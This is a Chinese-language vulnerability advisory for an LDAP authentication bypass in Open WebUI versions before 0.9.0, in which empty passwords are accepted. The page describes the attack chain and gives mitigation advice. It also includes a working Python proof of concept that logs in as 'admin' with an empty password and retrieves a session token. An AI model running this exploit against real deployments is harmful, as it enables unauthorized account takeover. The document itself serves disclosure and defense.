CVE-2026-44551 CVSS 9.1 严重

CVE-2026-44551 Open WebUI LDAP认证绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44551

漏洞类型

认证绕过

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI在0.9.0之前的版本中存在LDAP认证绕过漏洞。由于未对提交的密码进行非空校验，攻击者可利用空字符串通过LDAP Simple Bind验证，从而获取任意用户的完整会话令牌。

技术细节

该漏洞的核心在于Open WebUI的LdapForm Pydantic模型定义缺陷。模型将密码字段定义为`password: str`但未设置`min_length`约束，导致空字符串通过业务层验证。随后，应用直接使用该空字符串调用LDAP库的`Connection.bind()`方法。如果后端LDAP服务器配置允许空密码绑定（或支持匿名绑定），绑定操作将成功。应用随后错误地判定认证成功，颁发合法的Session Token，导致攻击者无需密码即可登录系统。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用Open WebUI平台，并确认其开启了LDAP认证功能。

STEP 2

构造请求

攻击者向LDAP认证端点发送POST请求，在请求体中填入目标用户的用户名（如admin），并将密码字段设置为空字符串。

STEP 3

绕过验证

Open WebUI的Pydantic模型验证通过，未拦截空密码。随后应用尝试使用空凭证与LDAP服务器进行Simple Bind。

STEP 4

获取权限

若LDAP服务器允许空密码绑定，绑定成功。Open WebUI认证逻辑被绕过，向攻击者返回有效的会话令牌。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (adjust based on actual deployment)
target_url = "http://target-open-webui/api/v1/auths/ldap"

# Payload: Valid username and empty password
payload = {
    "username": "admin",
    "password": ""
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Exploit successful! Token received:")
        print(response.json())
    else:
        print("[-] Exploit failed or patched.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施

建议立即升级到修复版本。如无法立即升级，应暂时禁用LDAP登录功能，直到完成升级，以防止未授权访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表